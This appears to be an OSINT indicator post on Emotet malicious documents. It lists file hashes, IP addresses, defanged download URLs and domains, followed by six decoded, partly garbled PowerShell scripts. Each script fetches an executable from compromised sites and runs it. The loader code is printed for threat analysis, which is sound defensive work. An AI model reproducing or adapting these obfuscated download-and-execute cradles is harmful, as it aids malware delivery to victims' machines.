paladin316

Emotet_Doc_out_2020-09-22_16_13.txt

Sep 22nd, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4. 0375b4835fb4def35254dd37af3b71c8c92dbafb8af44ccf8f7ff85e3751ffb7
  5. 8c3a4338d7f182b5a61fca23d6848bdf9a3bb775d6c5c938b82cfb845aec45a3
  6. 35cde8868a2076e10e0dfddb3ec487a74ca52b6643cef4d514deb69d11e9edd5
  7. c60660ab0787ad07d92caba8f19ce8fd7de59a44856d3c442a770672842f3ad4
  8. e64bcab1a1f2160f9a78d618a0bea25b228470c38a589b537149a8abbc4401f7
  9. f004c200aee13a599b9132f323cf3c1752babe33e106d55ef045391c394211a8
  10. 292a48621b6f7863d1a7d04f25cd2c6ddbcbf5abac1282941d3ba20ae076b776
  11. 292a48621b6f7863d1a7d04f25cd2c6ddbcbf5abac1282941d3ba20ae076b776
  12. 5d9ea64e57564b3e412eb44aa61235c5b1cb4d677aa5089910f9a5f1c6e6b1bc
  13. 5d9ea64e57564b3e412eb44aa61235c5b1cb4d677aa5089910f9a5f1c6e6b1bc
  14. c8ec1b5a11693054c13c42e45d83be353dc88a30205b63b6e820c12c9b38a13f
  15. c8ec1b5a11693054c13c42e45d83be353dc88a30205b63b6e820c12c9b38a13f
  16. b2fdf39787d7404bc206d1a5ed3b41053eaa0c375641af699e74f70281097f29
  17. b2fdf39787d7404bc206d1a5ed3b41053eaa0c375641af699e74f70281097f29
  18. c19dd05cf11f244d0b2189ff9b5075a190c1a64d8c65dd5f47a65e3bb8c2b869
  19. 9addba96a219cf69e04822cf43a65d6b7da0f848ac179d2276ef2a448ca362cb
  20. 9addba96a219cf69e04822cf43a65d6b7da0f848ac179d2276ef2a448ca362cb
  21. ed6598e7e6d37524439397ed78a735fe41117f47c0964cba780b5800d4eb5146
  22. ed6598e7e6d37524439397ed78a735fe41117f47c0964cba780b5800d4eb5146
  23. ba2753c69b06b5198fcc5ab9d75dd5760f634a64845c40f9d1518228e8611079
  24. 061d0e30973bd296c440a37565de8038d2952e85e0800e599c4049fec446fd8d
  25. 217d18116ca119751a9e29f6ed27a4fe97fe6fc8bfe088610cf7841c4fd8dab8
  26. 7aa7d38a55d5f7d01ee40a977a2df63d0cd4c938482a2fba3c73e1844405a0fc
  27. 90f5fcbadecf831b2ea1ad31be2ad24a539c2886611a270e23975355d3ba2692
  28. fb7120cd04c6c488c5a564bb24d9d155389d7cb8a0293e552dd385110bc6ec9f
  29. f574d141e50f5f004b6d5b2932ce746ef012404c5bf46933947ad0ce3b397665
  30. 050935f49889548f87753aa002d3e6204e6b6ef7a540a5ca8111e9b5f5d275e2
  31. b1b89eb23fc161742f78b19b454b7d0a3b657572a55212755323ccb39886d9e3
  32. e5feef66c305d39b964ea0daecb60211c37c70d35ae53a638ac6a43c344abd4d
  33. 4ea41230838a7c1fc89aa8cc3219dbc0640f6dc558b91cf9117815cea3b1480c
  34. 570b9fbca778d14336e0e4f0af778c33c2da79f575e171fcb8f6ba01c135163b
  35. 2f40f8c0127c5d28872650dc20bcd01845874f082242f1ead973adb422a7b377
  36. 8d49090e5ad1ca487645e8dad8b6e90d267b4a7f5d4cdf4d9c4441d969f088ca
  37. 821de39cb913b24cdd6d95facee8f4ce99d24f569e6e069a779893562486e536
  38. 6b58f3d639dbfd3f04c2534bac10583c7e2d0ba1e88ef31ebe443fc18f409a76
  39. 6b58f3d639dbfd3f04c2534bac10583c7e2d0ba1e88ef31ebe443fc18f409a76
  40. 1b29befdf0bca8218c36edb5cab59349355ecbdc760f419096bed97f5630be14
  41. f46d933cc794ec8f95dd03ddc687ee164ba570053e0d0813e8d79c4d09ab368d
  42. 5113e330fdea6c93e3ef5a610817655f04d59be9bb5fa3a4f4167f8ccbb01d48
  43. 2009f9056e90d2564b967fa225b898cbbdb0cd957efec3b1211b18925d410695
  44. f482643e9c789b0358eca0cec6dd9523355bffb2da53b01de9027ace5430b3d0
  45. 5d282237d6e5c0b30771b81556082a026563fc848280761cf0b375a39f36245f
  46. 8be623528fb4fc5e2d55097ef418336596be88914357dc10877ff9db0826a918
  47. f0dbc484997e20fe5db380cddafa06e0d939fe71ce91d0fe4ed65ebabcd06b3a
  48. 2eafdbcf47ac1cf227443b62069f3222d350cd81096fe0f948887a741d32d7de
  49. 2521f8a80c3d5dfb6d02974f29fbf398618f9cedc21a5009183aef65d1ef6904
  50. bea38752f29488eceb11331cdd52a11f2eda1ac4a1d247e5769261e99b8d38c2
  51. 4cf44fec1d562df92879e4f30d039d271d3178069c2bf587a080f9f0ed11c097
  52. 1433b33836a5b9fd72cccccf1c7b9762f11647c7bc57b9dd43a15b56310055ce
  53. 73952940eab75cb0f3ffdec59f7aedf9a2895246f7c82609505f3f62bcd66abc
  54. d22885b2f130ce45979448850589d91285f8dc8a61a9ddf78ee7aa302b1d4d01
  55. 302e8726fa91efa42546ebb326ec43baf90e3da145cd9a9e3e39a25e9949bbe3
  56. 302e8726fa91efa42546ebb326ec43baf90e3da145cd9a9e3e39a25e9949bbe3
  57. 193194a1f2cec3953fba2121f846171524d92ef27569d72e891d3a175cafa647
  58. 193194a1f2cec3953fba2121f846171524d92ef27569d72e891d3a175cafa647
  59. 782b420b0803c8a180a9bcc152c023b3a00a5a22bd923d0f646798c4b0af7ca2
  60. 782b420b0803c8a180a9bcc152c023b3a00a5a22bd923d0f646798c4b0af7ca2
  61. 4f8e5670cb71d357da7b7eb48753d60aee76b24e8ad9bf8c7908c6410b488b64
  62. 4f8e5670cb71d357da7b7eb48753d60aee76b24e8ad9bf8c7908c6410b488b64
  63. 83c6179da780f419a2c33e82aa72779368169c6dfa0c13b5e1301c3ad3d33baa
  64. ca7549ac47fe8878435d685f43fefa878b106015da743a5ddfe694d36a0eec97
  65. a7b027ef7df5c684b6d46a60b649ea3e752168cb1f514d5583921c1feaede17c
  66. 700dfcd7a2a3ee3abdd98fa4a8497bb24736753955fe23c4a0714ae7fbe2ca41
  67. fb4363c35de1a94b136b3550566e650f9e96b64af57fbd014d949565e36235ad
  68. fb4363c35de1a94b136b3550566e650f9e96b64af57fbd014d949565e36235ad
  69. 684d538530f6095356b8290993e828154398388f70e1ea9fbf5b6082ef911cbc
  70. 684d538530f6095356b8290993e828154398388f70e1ea9fbf5b6082ef911cbc
  71. 167a50633bd1e80ef6c145b0ad4f6142754304ba747eaf37f0dfb2599bf49876
  72. 167a50633bd1e80ef6c145b0ad4f6142754304ba747eaf37f0dfb2599bf49876
  73. d0777eaec82602de3cb84fc277f571987563c6da7e98f0426c67dfe95b9580ed
  74. 5cc7d1e73511b36eb3ae34e14a8a6eb95e201da4e57a4c7cbb02f475bfe521e0
  75. 06ae9d7036f2eab98389d37f9c78727563820bc3e43f8dfdb2493e93c4a4a743
  76. 64a28ead161d7e6125bb0eb7e8fb2cfa83c18c53ba5b8c0b369f222bd4c28ad6
  77. 71662eb323a9a4af953568b9ee749cabc486bbd0e17d2b0cf2d52ff88cf6bbaf
  78. 37cfd631a84f8c6a37cf75bc776308cab50f97e915ddbebca7405e9b2abebdcd
  79. 482b54b8d99750fad27a5d6131580e9639eb71432b6befb5dd5ca0b27f67881f
  80. 013f49af6f7f5e1e34116aa22e1bc2ba4babbb2c0b0f97bf4da287ce88b16a16
  81. 53ba841833e4a9acfb16fa855e6f616913dfd599db840ad5f7aba6635ebda0ae
  82. 53ba841833e4a9acfb16fa855e6f616913dfd599db840ad5f7aba6635ebda0ae
  83. e9325bf53bdb893300c9633950651c3ccae5cf1c4d9485bd9a51932bf3834eed
  84. e9325bf53bdb893300c9633950651c3ccae5cf1c4d9485bd9a51932bf3834eed
  85. 51ae65c1bfb9227a2a69b19041097b6323131a87f452e961d28d112302ec7203
  86. b1a87efb52cb8e72a662e48033454ac0de75808fad6e51b8d0892931baa1dc9e
  87. 9d69feedac414e2e1554965f077deb501f1f7a47ceb72ab2b68539c8314e602b
  88. 5599e7ebf3dc1f2899eb3e9470f8a472d87feaabdcbd8d5db07c34cf1c6ceba5
  89. d2ea12fefb301a8fca40a7bb452129cbe179e859d6ece374174e1c86964e9ce1
  90.  
  91.  
  92. IPs:
  93. 103.21.58.231
  94. 103.53.43.93
  95. 104.153.72.10
  96. 104.18.37.227
  97. 104.18.38.35
  98. 104.18.39.35
  99. 104.18.44.123
  100. 104.18.45.123
  101. 104.18.48.138
  102. 104.18.49.138
  103. 104.24.120.61
  104. 104.24.121.61
  105. 104.27.136.105
  106. 104.27.137.105
  107. 104.28.28.137
  108. 104.28.29.137
  109. 106.12.17.139
  110. 116.202.234.171
  111. 123.59.232.99
  112. 134.122.112.132
  113. 142.54.202.95
  114. 144.202.34.33
  115. 149.56.22.201
  116. 157.175.3.229
  117. 161.35.19.129
  118. 162.144.90.127
  119. 165.22.194.33
  120. 167.86.66.95
  121. 172.67.141.65
  122. 172.67.146.133
  123. 172.67.165.12
  124. 172.67.191.58
  125. 172.67.191.84
  126. 172.67.200.61
  127. 178.128.200.183
  128. 180.101.45.198
  129. 18.223.29.204
  130. 185.143.233.5
  131. 185.143.234.5
  132. 188.68.47.69
  133. 208.91.199.181
  134. 34.83.139.14
  135. 34.93.116.168
  136. 35.232.214.226
  137. 35.247.203.136
  138. 40.84.232.28
  139. 45.119.81.203
  140. 45.32.136.161
  141. 45.33.59.76
  142. 49.235.92.117
  143. 52.231.154.57
  144. 52.35.48.190
  145. 54.233.138.94
  146. 63.250.36.225
  147. 66.96.162.253
  148. 68.183.81.190
  149. 72.52.197.50
  150. 82.223.27.124
  151. 85.215.94.214
  152. 85.95.237.88
  153. 94.23.8.183
  154.  
  155.  
  156.  
  157. URLs:
  158. hxxp://minershallmuseum.com/documents/D/
  159. hxxp://injazjordan.com/moodle/Vh/
  160. hxxps://site1.xyz/wp-admin/Y/
  161. hxxp://2bstone.com/vr7tf0c/ZD/
  162. hxxp://biology-360.com/wp-admin/hv/
  163. hxxp://tez-tour.site/wp-content/9sB/
  164. hxxp://iooe.cn/wp-content/hdO/
  165. hxxp://fulfillmententertainment.com/cgi-bin/jO/
  166. hxxp://meadtimes.com/wp-content/VZrDrTw/
  167. hxxp://pinturasydecoracionluis.com/wp-admin/fK3/
  168. hxxp://oconsign.com/cgi-bin/koLViD/
  169. hxxp://umapreowned.com/wp-admin/XF7RBbs/
  170. hxxp://kitecorp.ca/wp-includes/kEI98N/
  171. hxxp://moneyii.com/website/ddeoUDo/
  172. hxxps://waytoger.com/wp-admin/w/
  173. hxxps://jaguarssus.xyz/wp-admin/GfU/
  174. hxxps://learnkalmar.com/wp-includes/VSZ/
  175. hxxp://tiendapablus.net/cgi-bin/SIr/
  176. hxxps://prsaze.com/wp-admin/7a/
  177. hxxps://www.campuscamarafp.com/wp-admin/N/
  178. hxxps://infolockerz.com/wp-content/x/
  179. hxxps://www.1plus-agency.com/tmp/nlr08Z0/
  180. hxxp://winadev.com/uglot/iiClU/
  181. hxxps://enews.enkj.com/wordpress/h62/
  182. hxxps://apicosto.misco-furniture.com/dvzmj/0xm3yS/
  183. hxxp://drbeatrice.com/wp-content/HSz/
  184. hxxps://ienerpro.com/cgi-bin/VVwhOR/
  185. hxxps://premierbarsamui.com/Irc/O/
  186. hxxps://eaglehatch.com/wp-content/TwA6w6/
  187. hxxps://www.tiendajuanvaldez.com/wp-admin/igkf/
  188. hxxps://aspeninstitute.es/catalogmap/fAatpjn/
  189. hxxps://1horse.ir/wp-includes/7Ev/
  190. hxxps://theshopclubs.com/wp-admin/7/
  191. hxxps://eliteweb.cl/dev-area/6V/
  192. hxxps://stockval.com.br/wp-admin/68K36/
  193. hxxp://amvp-py.com/amvp/r/
  194. hxxps://dagranitegiare.com/wp-admin/d/
  195. hxxps://emitt-tech.com/wp-admin/2qG/
  196. hxxp://kvaser-microsite.tagsom.company/wp-includes/a/
  197. hxxps://aravindhherbalstore.com/wp-admin/TPA/
  198. hxxp://leo.jelct.com/wp-content/Hce/
  199. hxxp://domiciliazione.org/wp/UT8/
  200.  
  201.  
  202. Domains:
  203. minershallmuseum.com
  204. injazjordan.com
  205. site1.xyz
  206. 2bstone.com
  207. biology-360.com
  208. tez-tour.site
  209. iooe.cn
  210. fulfillmententertainment.com
  211. meadtimes.com
  212. pinturasydecoracionluis.com
  213. oconsign.com
  214. umapreowned.com
  215. kitecorp.ca
  216. moneyii.com
  217. waytoger.com
  218. jaguarssus.xyz
  219. learnkalmar.com
  220. tiendapablus.net
  221. prsaze.com
  222. www.campuscamarafp.com
  223. infolockerz.com
  224. www.1plus-agency.com
  225. winadev.com
  226. enews.enkj.com
  227. apicosto.misco-furniture.com
  228. drbeatrice.com
  229. ienerpro.com
  230. premierbarsamui.com
  231. eaglehatch.com
  232. www.tiendajuanvaldez.com
  233. aspeninstitute.es
  234. 1horse.ir
  235. theshopclubs.com
  236. eliteweb.cl
  237. stockval.com.br
  238. amvp-py.com
  239. dagranitegiare.com
  240. emitt-tech.com
  241. kvaser-microsite.tagsom.company
  242. aravindhherbalstore.com
  243. leo.jelct.com
  244. domiciliazione.org
  245.  
  246.  
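  247. Decoded Base64 PowerShell (six scripts; the decoder stripped quotes and parentheses and left undecodable bytes at each script boundary, so the text below is not valid PowerShell as shown. Each script creates a folder under the user profile, tries its seven URLs with Net.WebClient DownloadFile, and opens the saved .exe with Invoke-Item only when the file is at least a set size, 22846 to 32466 bytes across these samples):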
  248. ����^�$Z5m4qap=Ziw_ks7;
  249. &new-item $Env:UserpRoFiLe\AxmrHAT\J5cki19\ -itemtype dirECTorY;
  250. [Net.ServicePointManager]::"sE`cuRI`Typ`RO`TOCol" = tls12, tls11, tls;
  251. $Xn9t6jy = Quw2u4t;
  252. $Dx053bg=Lztb872;
  253. $Iybmx5m=$env:userprofile{0}Axmrhat{0}J5cki19{0}-f[ChaR]92$Xn9t6jy.exe;
  254. $Fys0ote=X3yzehz;
  255. $Djtxqrm=.new-object Net.WeBClieNt;
  256. $Nlxtnia=hxxp://minershallmuseum.com/documents/D/
  257. hxxp://injazjordan.com/moodle/Vh/
  258. hxxps://site1.xyz/wp-admin/Y/
  259. hxxp://2bstone.com/vr7tf0c/ZD/
  260. hxxp://biology-360.com/wp-admin/hv/
  261. hxxp://tez-tour.site/wp-content/9sB/
  262. hxxp://iooe.cn/wp-content/hdO/."sP`lIT"[char]42;
  263. $Hax4bv8=Aouv06o;
  264. foreach$Ok2xn7j in $Nlxtnia{try{$Djtxqrm."Down`Load`FilE"$Ok2xn7j, $Iybmx5m;
  265. $Vvs8lu8=Nd8ansd;
  266. If .Get-Item $Iybmx5m."L`EnGTh" -ge 24468 {.Invoke-Item$Iybmx5m;
  267. $I28j00x=O9a0t7c;
  268. break;
  269. $Y7tz473=Aj9z8vt}}catch{}}$Ivxdrs6=Wf3w8y_����^�$Eds_g9a=Rz7rfhd;
  270. .new-item $env:USERPROfIlE\E5uHF3D\akvy3Ll\ -itemtype DIRECtOry;
  271. [Net.ServicePointManager]::"SEcUr`I`TYPro`T`OCOL" = tls12, tls11, tls;
  272. $Scffs6q = G7qa2o;
  273. $N3owl5q=K2q_onr;
  274. $H6rxvoe=$env:userprofile6MOE5uhf3d6MOAkvy3ll6MO."Re`pL`Ace"[cHAr]54[cHAr]77[cHAr]79,[sTRING][cHAr]92$Scffs6q.exe;
  275. $G4etq7w=Vhoo76k;
  276. $A2946xu=.new-object NEt.wEbCLIeNt;
  277. $V4uwtkm=hxxp://fulfillmententertainment.com/cgi-bin/jO/
  278. hxxp://meadtimes.com/wp-content/VZrDrTw/
  279. hxxp://pinturasydecoracionluis.com/wp-admin/fK3/
  280. hxxp://oconsign.com/cgi-bin/koLViD/
  281. hxxp://umapreowned.com/wp-admin/XF7RBbs/
  282. hxxp://kitecorp.ca/wp-includes/kEI98N/
  283. hxxp://moneyii.com/website/ddeoUDo/."s`PliT"[char]42;
  284. $Uo0h3lz=Fws1zhz;
  285. foreach$Azqx6lv in $V4uwtkm{try{$A2946xu."Do`wnloAdf`ilE"$Azqx6lv, $H6rxvoe;
  286. $Urhhx6j=Er4epbh;
  287. If .Get-Item $H6rxvoe."LENG`Th" -ge 30645 {&Invoke-Item$H6rxvoe;
  288. $Mg_pjw9=Mk5o8iw;
  289. break;
  290. $Pwpycm9=Hbltuhg}}catch{}}$Zjha1nt=Hdevpkj����^�$Mai3v3v=Cs7rz3l;
  291. .new-item $enV:UsERPRoFIle\oqvI_4E\ZfI5CKX\ -itemtype direCtORy;
  292. [Net.ServicePointManager]::"s`e`cUri`TypRO`TOcoL" = tls12, tls11, tls;
  293. $P59vpaw = Jn7xvio0;
  294. $Fsjrr5l=Wdp36n4;
  295. $T4rsp1k=$env:userprofile{0}Oqvi_4e{0}Zfi5ckx{0} -F [ChAr]92$P59vpaw.exe;
  296. $Qer9xvh=Sqzpask;
  297. $G9o_ucj=.new-object NeT.weBClIENt;
  298. $Qoorkwn=hxxps://waytoger.com/wp-admin/w/
  299. hxxps://jaguarssus.xyz/wp-admin/GfU/
  300. hxxps://learnkalmar.com/wp-includes/VSZ/
  301. hxxp://tiendapablus.net/cgi-bin/SIr/
  302. hxxps://prsaze.com/wp-admin/7a/
  303. hxxps://www.campuscamarafp.com/wp-admin/N/
  304. hxxps://infolockerz.com/wp-content/x/."Spl`IT"[char]42;
  305. $Hcnjlrx=Ol5y73t;
  306. foreach$O_lqcgq in $Qoorkwn{try{$G9o_ucj."D`ow`NLOadFi`Le"$O_lqcgq, $T4rsp1k;
  307. $C30d8bc=Hp3af8g;
  308. If .Get-Item $T4rsp1k."LENG`TH" -ge 27197 {&Invoke-Item$T4rsp1k;
  309. $Vs3auuf=Unm2t00;
  310. break;
  311. $Rmitgzi=S071xuy}}catch{}}$M6cj2at=Uxez173����^�$Qck828v=Rhxdsoj;
  312. &new-item $ENv:UseRPrOfilE\XB1rqMo\Cj2z2jP\ -itemtype DIrECTory;
  313. [Net.ServicePointManager]::"Sec`U`Rit`YpR`OtoCoL" = tls12, tls11, tls;
  314. $Mo60ckx = Tlylng;
  315. $Kyr3l36=G_gmaa2;
  316. $Tb_6ust=$env:userprofileX9BXb1rqmoX9BCj2z2jpX9B."R`E`plaCE"[CHAR]88[CHAR]57[CHAR]66,[strinG][CHAR]92$Mo60ckx.exe;
  317. $Zrj5izk=Raw0pwd;
  318. $Tj3a913=&new-object NEt.WEBclieNt;
  319. $Zh9frnn=hxxps://www.1plus-agency.com/tmp/nlr08Z0/
  320. hxxp://winadev.com/uglot/iiClU/
  321. hxxps://enews.enkj.com/wordpress/h62/
  322. hxxps://apicosto.misco-furniture.com/dvzmj/0xm3yS/
  323. hxxp://drbeatrice.com/wp-content/HSz/
  324. hxxps://ienerpro.com/cgi-bin/VVwhOR/
  325. hxxps://premierbarsamui.com/Irc/O/."s`plit"[char]42;
  326. $L37jjek=Vhpelbi;
  327. foreach$Knouncx in $Zh9frnn{try{$Tj3a913."dOw`NloA`DFiLE"$Knouncx, $Tb_6ust;
  328. $Z0y6dmb=Jrdlf7v;
  329. If .Get-Item $Tb_6ust."lE`NGTh" -ge 32466 {&Invoke-Item$Tb_6ust;
  330. $W7ifsd7=Oabkgzx;
  331. break;
  332. $N0r0ihe=E74a_u9}}catch{}}$Uiqg_0s=Uzumapg����^�$Seebx6u=Ml28ys9;
  333. &new-item $eNV:uSeRProFiLE\gYr1jQK\kcQEFh5\ -itemtype DiReCtoRy;
  334. [Net.ServicePointManager]::"secUrI`Typ`Ro`TO`CoL" = tls12, tls11, tls;
  335. $Ahlat13 = Eaw3l8;
  336. $K5bzk1a=Vo1mov1;
  337. $Vdvcmge=$env:userprofile{0}Gyr1jqk{0}Kcqefh5{0} -F [ChAR]92$Ahlat13.exe;
  338. $Jeai9zn=Xfo9evb;
  339. $Jm10ei9=&new-object NeT.WeBcLIENt;
  340. $Qwu2e0t=hxxps://eaglehatch.com/wp-content/TwA6w6/
  341. hxxps://www.tiendajuanvaldez.com/wp-admin/igkf/
  342. hxxps://aspeninstitute.es/catalogmap/fAatpjn/
  343. hxxps://1horse.ir/wp-includes/7Ev/
  344. hxxps://theshopclubs.com/wp-admin/7/
  345. hxxps://eliteweb.cl/dev-area/6V/
  346. hxxps://stockval.com.br/wp-admin/68K36/."SPL`IT"[char]42;
  347. $U42hvgk=Mh9t9gt;
  348. foreach$T0t6q4x in $Qwu2e0t{try{$Jm10ei9."Dow`N`loadfIlE"$T0t6q4x, $Vdvcmge;
  349. $Lejylyp=Mf3elc0;
  350. If .Get-Item $Vdvcmge."Len`G`Th" -ge 24690 {.Invoke-Item$Vdvcmge;
  351. $Luw6tlg=H213502;
  352. break;
  353. $Yramo0e=B2ppfop}}catch{}}$Sgtx8w9=B5a8z9x����^�$Ymhr2ut=B3lamaa;
  354. &new-item $EnV:uSerpRoFile\hu0ls_L\tTVxmGD\ -itemtype dIrecTory;
  355. [Net.ServicePointManager]::"sECU`R`ITyPrO`ToC`Ol" = tls12, tls11, tls;
  356. $Hoq_mvj = N0_70cxdm;
  357. $Mw06pel=Ban3z2a;
  358. $Cyuieus=$env:userprofiledQGHu0ls_ldQGTtvxmgddQG."Re`pLa`Ce"[CHaR]100[CHaR]81[CHaR]71,\$Hoq_mvj.exe;
  359. $G2yll2t=Dngiz8z;
  360. $Omrkfl4=.new-object NET.WEbclIeNt;
  361. $Buswp3a=hxxp://amvp-py.com/amvp/r/
  362. hxxps://dagranitegiare.com/wp-admin/d/
  363. hxxps://emitt-tech.com/wp-admin/2qG/
  364. hxxp://kvaser-microsite.tagsom.company/wp-includes/a/
  365. hxxps://aravindhherbalstore.com/wp-admin/TPA/
  366. hxxp://leo.jelct.com/wp-content/Hce/
  367. hxxp://domiciliazione.org/wp/UT8/."sp`LIt"[char]42;
  368. $D6c9uim=Ru__p3k;
  369. foreach$J3okp9n in $Buswp3a{try{$Omrkfl4."D`OWnl`oadfIlE"$J3okp9n, $Cyuieus;
  370. $Vs58pbv=Cg1b9dd;
  371. If .Get-Item $Cyuieus."lE`NG`TH" -ge 22846 {&Invoke-Item$Cyuieus;
  372. $Gx5yd8a=Mw33tnn;
  373. break;
  374. $Yohc4zd=I6osljw}}catch{}}$Vzgfqv2=Ut0p4_u